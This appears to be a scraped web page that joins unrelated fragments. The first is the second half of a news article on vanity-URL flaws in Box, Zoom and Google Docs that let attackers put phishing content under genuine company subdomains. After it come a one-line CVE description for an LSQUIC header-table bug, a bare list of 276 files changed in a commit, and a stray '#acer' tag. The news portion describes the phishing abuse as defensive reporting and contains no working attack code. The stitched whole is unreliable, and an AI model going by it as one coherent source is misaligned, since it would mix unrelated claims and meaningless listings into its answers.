“It can make a massive difference because spoofed links appear legitimate to security technologies like email filters and CASBs (Cloud Access Security Broker\],” Sobers told The Daily Swig.

“They would normally block a faked or misspelled URL (like apple-support.zoom.us). In this case, since we’re spoofing the REAL URL, there’s no way for these types of technologies to automatically filter or flag the URL as malicious.”

Sobers continued: “Also, savvy users can typically pick up on subtle differences when loading a fake URL in their browser – things like an invalid security certificate or misspelled subdomain. With this abuse, the URL and certificate are completely valid.”

Since three of the most widely used SaaS apps containing the same flaw, “it’s very likely that similar issues exist in other SaaS apps”, warned Sobers.

**Tell-tale signs**

Box, the popular cloud content management app, patched flaws affecting vanity URLs for file-sharing and public forms used to request files and associated information.

The file-sharing issue was exacerbated by an attacker’s ability to add password protection to malicious files and upload a targeted brand’s logo and recreate its color scheme, while the absence of branding on public forms makes it harder for victims to spot tell-tale design flaws.

A spokesperson from Zoom told The Daily Swig that it had addressed the potential abuse of vanity URLs for meeting recordings and webinar registration pages “by warning users if they are being redirected to a different subdomain”.

However, Varonis urged users to be “cautious when accessing branded Zoom links” given that “users often click through non-critical warning messages”.

Attackers could also brand a Google Form requesting sensitive confidential data with targeted company’s logo as yourcompanydomain.docs.google.com/forms/d/e/:form\_id/viewform.

“The form could require registering with an email from your company domain, making it seem more trustworthy,” said Varonis.

Google Doc documents exchanged via the ‘publish to web’ feature are similarly vulnerable.

Google is yet to roll out a fix, according to Varonis.

YOU MIGHT ALSO LIKE RuTube hack: Russian video platform denies loss of source code following cyber-attack

Box, Zoom, Google Docs offer phishing boost with ‘vanity URL’ flaws

liblsquic/lsquic_qenc_hdl.c in LiteSpeed QUIC (aka LSQUIC) before 3.1.0 mishandles MAX_TABLE_CAPACITY.

Permalink

Showing with **294 additions** and **287 deletions**.

1.  +1 −1 APIs.txt
2.  +11 −0 CHANGELOG
3.  +1 −9 CMakeLists.txt
4.  +1 −1 CONTRIBUTORS.txt
5.  +1 −1 EXAMPLES.txt
6.  +1 −1 LICENSE
7.  +1 −1 bin/CMakeLists.txt
8.  +1 −1 bin/duck\_client.c
9.  +1 −1 bin/duck\_server.c
10.  +1 −1 bin/echo\_client.c
11.  +1 −1 bin/echo\_server.c
12.  +1 −1 bin/http\_client.c
13.  +1 −1 bin/http\_server.c
14.  +1 −1 bin/md5\_client.c
15.  +1 −1 bin/md5\_server.c
16.  +1 −1 bin/perf\_client.c
17.  +1 −1 bin/perf\_server.c
18.  +1 −1 bin/prog.c
19.  +1 −1 bin/prog.h
20.  +1 −1 bin/test\_cert.c
21.  +1 −1 bin/test\_cert.h
22.  +1 −1 bin/test\_common.c
23.  +1 −1 bin/test\_common.h
24.  +3 −3 docs/conf.py
25.  +3 −3 include/lsquic.h
26.  +1 −1 include/lsquic\_types.h
27.  +1 −1 include/lsxpack\_header.h
28.  +1 −1 src/CMakeLists.txt
29.  +2 −1 src/liblsquic/CMakeLists.txt
30.  +1 −1 src/liblsquic/common\_cert\_set\_2.c
31.  +1 −1 src/liblsquic/common\_cert\_set\_2a.inc
32.  +1 −1 src/liblsquic/common\_cert\_set\_2b.inc
33.  +1 −1 src/liblsquic/common\_cert\_set\_3.c
34.  +1 −1 src/liblsquic/common\_cert\_set\_3a.inc
35.  +1 −1 src/liblsquic/common\_cert\_set\_3b.inc
36.  +1 −1 src/liblsquic/fiu-local.h
37.  +1 −1 src/liblsquic/ls-sfparser.c
38.  +1 −1 src/liblsquic/ls-sfparser.h
39.  +1 −1 src/liblsquic/lsquic\_adaptive\_cc.c
40.  +1 −1 src/liblsquic/lsquic\_adaptive\_cc.h
41.  +1 −1 src/liblsquic/lsquic\_alarmset.c
42.  +1 −1 src/liblsquic/lsquic\_alarmset.h
43.  +1 −1 src/liblsquic/lsquic\_arr.c
44.  +1 −1 src/liblsquic/lsquic\_arr.h
45.  +1 −1 src/liblsquic/lsquic\_attq.c
46.  +1 −1 src/liblsquic/lsquic\_attq.h
47.  +1 −1 src/liblsquic/lsquic\_bbr.c
48.  +1 −1 src/liblsquic/lsquic\_bbr.h
49.  +1 −1 src/liblsquic/lsquic\_bw\_sampler.c
50.  +1 −1 src/liblsquic/lsquic\_bw\_sampler.h
51.  +1 −1 src/liblsquic/lsquic\_byteswap.h
52.  +1 −1 src/liblsquic/lsquic\_cfcw.c
53.  +1 −1 src/liblsquic/lsquic\_chsk\_stream.c
54.  +1 −1 src/liblsquic/lsquic\_chsk\_stream.h
55.  +1 −1 src/liblsquic/lsquic\_cong\_ctl.h
56.  +1 −1 src/liblsquic/lsquic\_conn.c
57.  +1 −1 src/liblsquic/lsquic\_conn.h
58.  +1 −1 src/liblsquic/lsquic\_conn\_flow.h
59.  +1 −1 src/liblsquic/lsquic\_conn\_public.h
60.  +1 −1 src/liblsquic/lsquic\_crand.c
61.  +1 −1 src/liblsquic/lsquic\_crand.h
62.  +1 −1 src/liblsquic/lsquic\_crt\_compress.c
63.  +1 −1 src/liblsquic/lsquic\_crt\_compress.h
64.  +1 −1 src/liblsquic/lsquic\_crypto.c
65.  +1 −1 src/liblsquic/lsquic\_crypto.h
66.  +1 −1 src/liblsquic/lsquic\_cubic.c
67.  +1 −1 src/liblsquic/lsquic\_cubic.h
68.  +1 −1 src/liblsquic/lsquic\_data\_in\_if.h
69.  +1 −1 src/liblsquic/lsquic\_di\_error.c
70.  +1 −1 src/liblsquic/lsquic\_di\_hash.c
71.  +1 −1 src/liblsquic/lsquic\_di\_nocopy.c
72.  +1 −1 src/liblsquic/lsquic\_enc\_sess.h
73.  +1 −1 src/liblsquic/lsquic\_enc\_sess\_common.c
74.  +1 −1 src/liblsquic/lsquic\_enc\_sess\_ietf.c
75.  +1 −1 src/liblsquic/lsquic\_eng\_hist.c
76.  +1 −1 src/liblsquic/lsquic\_eng\_hist.h
77.  +1 −1 src/liblsquic/lsquic\_engine.c
78.  +1 −1 src/liblsquic/lsquic\_engine\_public.h
79.  +1 −1 src/liblsquic/lsquic\_ev\_log.c
80.  +1 −1 src/liblsquic/lsquic\_ev\_log.h
81.  +1 −1 src/liblsquic/lsquic\_frab\_list.c
82.  +1 −1 src/liblsquic/lsquic\_frab\_list.h
83.  +1 −1 src/liblsquic/lsquic\_frame\_common.c
84.  +1 −1 src/liblsquic/lsquic\_frame\_common.h
85.  +1 −1 src/liblsquic/lsquic\_frame\_reader.c
86.  +1 −1 src/liblsquic/lsquic\_frame\_reader.h
87.  +1 −1 src/liblsquic/lsquic\_frame\_writer.c
88.  +1 −1 src/liblsquic/lsquic\_frame\_writer.h
89.  +1 −1 src/liblsquic/lsquic\_full\_conn.c
90.  +1 −1 src/liblsquic/lsquic\_full\_conn.h
91.  +1 −1 src/liblsquic/lsquic\_full\_conn\_ietf.c
92.  +1 −1 src/liblsquic/lsquic\_global.c
93.  +1 −1 src/liblsquic/lsquic\_handshake.c
94.  +1 −1 src/liblsquic/lsquic\_handshake.h
95.  +1 −1 src/liblsquic/lsquic\_hash.c
96.  +1 −1 src/liblsquic/lsquic\_hash.h
97.  +1 −1 src/liblsquic/lsquic\_hcsi\_reader.c
98.  +1 −1 src/liblsquic/lsquic\_hcsi\_reader.h
99.  +1 −1 src/liblsquic/lsquic\_hcso\_writer.c
100.  +1 −1 src/liblsquic/lsquic\_hcso\_writer.h
101.  +1 −1 src/liblsquic/lsquic\_headers.h
102.  +1 −1 src/liblsquic/lsquic\_headers\_stream.c
103.  +1 −1 src/liblsquic/lsquic\_headers\_stream.h
104.  +1 −1 src/liblsquic/lsquic\_hkdf.c
105.  +1 −1 src/liblsquic/lsquic\_hkdf.h
106.  +1 −1 src/liblsquic/lsquic\_hpi.c
107.  +1 −1 src/liblsquic/lsquic\_hpi.h
108.  +1 −1 src/liblsquic/lsquic\_hq.h
109.  +1 −1 src/liblsquic/lsquic\_hspack\_valid.c
110.  +1 −1 src/liblsquic/lsquic\_http.c
111.  +1 −1 src/liblsquic/lsquic\_http1x\_if.c
112.  +1 −1 src/liblsquic/lsquic\_http1x\_if.h
113.  +1 −1 src/liblsquic/lsquic\_ietf.h
114.  +1 −1 src/liblsquic/lsquic\_int\_types.h
115.  +1 −1 src/liblsquic/lsquic\_logger.c
116.  +1 −1 src/liblsquic/lsquic\_logger.h
117.  +1 −1 src/liblsquic/lsquic\_malo.c
118.  +1 −1 src/liblsquic/lsquic\_malo.h
119.  +1 −1 src/liblsquic/lsquic\_min\_heap.c
120.  +1 −1 src/liblsquic/lsquic\_min\_heap.h
121.  +1 −1 src/liblsquic/lsquic\_mini\_conn.c
122.  +1 −1 src/liblsquic/lsquic\_mini\_conn.h
123.  +1 −1 src/liblsquic/lsquic\_mini\_conn\_ietf.c
124.  +1 −1 src/liblsquic/lsquic\_mini\_conn\_ietf.h
125.  +1 −1 src/liblsquic/lsquic\_minmax.c
126.  +1 −1 src/liblsquic/lsquic\_minmax.h
127.  +1 −1 src/liblsquic/lsquic\_mm.c
128.  +1 −1 src/liblsquic/lsquic\_mm.h
129.  +1 −1 src/liblsquic/lsquic\_pacer.c
130.  +1 −1 src/liblsquic/lsquic\_pacer.h
131.  +1 −1 src/liblsquic/lsquic\_packet\_common.c
132.  +1 −1 src/liblsquic/lsquic\_packet\_common.h
133.  +1 −1 src/liblsquic/lsquic\_packet\_gquic.c
134.  +1 −1 src/liblsquic/lsquic\_packet\_gquic.h
135.  +1 −1 src/liblsquic/lsquic\_packet\_ietf.h
136.  +1 −1 src/liblsquic/lsquic\_packet\_in.c
137.  +1 −1 src/liblsquic/lsquic\_packet\_in.h
138.  +1 −1 src/liblsquic/lsquic\_packet\_out.c
139.  +1 −1 src/liblsquic/lsquic\_packet\_out.h
140.  +1 −1 src/liblsquic/lsquic\_packet\_resize.c
141.  +1 −1 src/liblsquic/lsquic\_packet\_resize.h
142.  +1 −1 src/liblsquic/lsquic\_parse.h
143.  +1 −1 src/liblsquic/lsquic\_parse\_Q046.c
144.  +1 −1 src/liblsquic/lsquic\_parse\_Q050.c
145.  +1 −1 src/liblsquic/lsquic\_parse\_common.c
146.  +1 −1 src/liblsquic/lsquic\_parse\_common.h
147.  +1 −1 src/liblsquic/lsquic\_parse\_gquic\_be.c
148.  +1 −1 src/liblsquic/lsquic\_parse\_gquic\_be.h
149.  +1 −1 src/liblsquic/lsquic\_parse\_gquic\_common.c
150.  +1 −1 src/liblsquic/lsquic\_parse\_ietf.h
151.  +1 −1 src/liblsquic/lsquic\_parse\_ietf\_v1.c
152.  +1 −1 src/liblsquic/lsquic\_parse\_iquic\_common.c
153.  +1 −1 src/liblsquic/lsquic\_pr\_queue.c
154.  +1 −1 src/liblsquic/lsquic\_pr\_queue.h
155.  +1 −1 src/liblsquic/lsquic\_purga.c
156.  +1 −1 src/liblsquic/lsquic\_purga.h
157.  +1 −1 src/liblsquic/lsquic\_push\_promise.h
158.  +1 −1 src/liblsquic/lsquic\_qdec\_hdl.c
159.  +1 −1 src/liblsquic/lsquic\_qdec\_hdl.h
160.  +4 −1 src/liblsquic/lsquic\_qenc\_hdl.c
161.  +1 −1 src/liblsquic/lsquic\_qenc\_hdl.h
162.  +1 −1 src/liblsquic/lsquic\_qlog.c
163.  +1 −1 src/liblsquic/lsquic\_qlog.h
164.  +1 −1 src/liblsquic/lsquic\_qpack\_dec\_logger.h
165.  +1 −1 src/liblsquic/lsquic\_qpack\_enc\_logger.h
166.  +1 −1 src/liblsquic/lsquic\_qpack\_exp.c
167.  +1 −1 src/liblsquic/lsquic\_qpack\_exp.h
168.  +1 −1 src/liblsquic/lsquic\_qtags.h
169.  +1 −1 src/liblsquic/lsquic\_rechist.c
170.  +1 −1 src/liblsquic/lsquic\_rechist.h
171.  +1 −1 src/liblsquic/lsquic\_rtt.c
172.  +1 −1 src/liblsquic/lsquic\_rtt.h
173.  +1 −1 src/liblsquic/lsquic\_send\_ctl.c
174.  +1 −1 src/liblsquic/lsquic\_send\_ctl.h
175.  +1 −1 src/liblsquic/lsquic\_senhist.c
176.  +1 −1 src/liblsquic/lsquic\_senhist.h
177.  +1 −1 src/liblsquic/lsquic\_set.c
178.  +1 −1 src/liblsquic/lsquic\_set.h
179.  +1 −1 src/liblsquic/lsquic\_sfcw.c
180.  +1 −1 src/liblsquic/lsquic\_sfcw.h
181.  +1 −1 src/liblsquic/lsquic\_shsk\_stream.c
182.  +1 −1 src/liblsquic/lsquic\_shsk\_stream.h
183.  +1 −1 src/liblsquic/lsquic\_sizes.h
184.  +1 −1 src/liblsquic/lsquic\_spi.c
185.  +1 −1 src/liblsquic/lsquic\_spi.h
186.  +1 −1 src/liblsquic/lsquic\_stock\_shi.c
187.  +1 −1 src/liblsquic/lsquic\_stock\_shi.h
188.  +1 −1 src/liblsquic/lsquic\_str.c
189.  +1 −1 src/liblsquic/lsquic\_str.h
190.  +1 −1 src/liblsquic/lsquic\_stream.c
191.  +1 −1 src/liblsquic/lsquic\_stream.h
192.  +1 −1 src/liblsquic/lsquic\_tokgen.c
193.  +1 −1 src/liblsquic/lsquic\_tokgen.h
194.  +1 −1 src/liblsquic/lsquic\_trans\_params.c
195.  +1 −1 src/liblsquic/lsquic\_trans\_params.h
196.  +1 −1 src/liblsquic/lsquic\_trechist.c
197.  +1 −1 src/liblsquic/lsquic\_trechist.h
198.  +1 −1 src/liblsquic/lsquic\_util.c
199.  +1 −1 src/liblsquic/lsquic\_util.h
200.  +1 −1 src/liblsquic/lsquic\_varint.c
201.  +1 −1 src/liblsquic/lsquic\_varint.h
202.  +1 −1 src/liblsquic/lsquic\_ver\_neg.h
203.  +1 −1 src/liblsquic/lsquic\_version.c
204.  +1 −1 src/liblsquic/lsquic\_version.h
205.  +1 −1 src/liblsquic/lsquic\_xxhash.c
206.  +1 −1 src/liblsquic/lsquic\_xxhash.h
207.  +1 −1 tests/CMakeLists.txt
208.  +1 −1 tests/graph\_cubic.c
209.  +1 −1 tests/mini\_parse.c
210.  +1 −1 tests/test\_ack.c
211.  +1 −1 tests/test\_ack\_merge.c
212.  +1 −1 tests/test\_ackgen\_gquic\_be.c
213.  +1 −1 tests/test\_ackparse\_gquic\_be.c
214.  +1 −1 tests/test\_ackparse\_ietf.c
215.  +1 −1 tests/test\_alarmset.c
216.  +1 −1 tests/test\_alt\_svc\_ver.c
217.  +1 −1 tests/test\_arr.c
218.  +1 −1 tests/test\_attq.c
219.  +1 −1 tests/test\_blocked\_gquic\_be.c
220.  +1 −1 tests/test\_bw\_sampler.c
221.  +1 −1 tests/test\_chlo\_gen.c
222.  +1 −1 tests/test\_clear\_aead.c
223.  +1 −1 tests/test\_conn\_close\_gquic\_be.c
224.  +1 −1 tests/test\_conn\_hash.c
225.  +1 −1 tests/test\_crypto\_gen.c
226.  +1 −1 tests/test\_cubic.c
227.  +1 −1 tests/test\_dec.c
228.  +1 −1 tests/test\_di\_nocopy.c
229.  +1 −1 tests/test\_elision.c
230.  +1 −1 tests/test\_engine\_ctor.c
231.  +1 −1 tests/test\_export\_key.c
232.  +1 −1 tests/test\_frame\_chop.c
233.  +1 −1 tests/test\_frame\_reader.c
234.  +1 −1 tests/test\_frame\_rw.c
235.  +1 −1 tests/test\_frame\_writer.c
236.  +1 −1 tests/test\_goaway\_gquic\_be.c
237.  +1 −1 tests/test\_h3\_framing.c
238.  +1 −1 tests/test\_hcsi\_reader.c
239.  +1 −1 tests/test\_hkdf.c
240.  +1 −1 tests/test\_hpi.c
241.  +1 −1 tests/test\_lsquic\_hash.c
242.  +1 −1 tests/test\_malo.c
243.  +1 −1 tests/test\_min\_heap.c
244.  +1 −1 tests/test\_minmax.c
245.  +1 −1 tests/test\_packet\_out.c
246.  +1 −1 tests/test\_packet\_resize.c
247.  +1 −1 tests/test\_packno\_len.c
248.  +1 −1 tests/test\_parse\_packet\_in.c
249.  +1 −1 tests/test\_purga.c
250.  +1 −1 tests/test\_qlog.c
251.  +1 −1 tests/test\_quic\_be\_floats.c
252.  +1 −1 tests/test\_rechist.c
253.  +1 −1 tests/test\_reg\_pkt\_headergen.c
254.  +1 −1 tests/test\_rst\_stream\_gquic\_be.c
255.  +1 −1 tests/test\_rst\_stream\_ietf.c
256.  +1 −1 tests/test\_rtt.c
257.  +1 −1 tests/test\_send\_headers.c
258.  +1 −1 tests/test\_senhist.c
259.  +1 −1 tests/test\_set.c
260.  +1 −1 tests/test\_sfcw.c
261.  +1 −1 tests/test\_shi.c
262.  +1 −1 tests/test\_some\_packets.c
263.  +1 −1 tests/test\_spi.c
264.  +1 −1 tests/test\_stop\_waiting\_gquic\_be.c
265.  +1 −1 tests/test\_stream.c
266.  +1 −1 tests/test\_streamgen.c
267.  +1 −1 tests/test\_streamparse.c
268.  +1 −1 tests/test\_tokgen.c
269.  +1 −1 tests/test\_trapa.c
270.  +1 −1 tests/test\_trechist.c
271.  +1 −1 tests/test\_varint.c
272.  +1 −1 tests/test\_ver\_nego.c
273.  +1 −1 tests/test\_wuf\_gquic\_be.c
274.  +1 −1 wincompat/README.txt
275.  +1 −1 wincompat/sys/queue.h
276.  +1 −1 wincompat/vc\_compat.h

Tag

#acer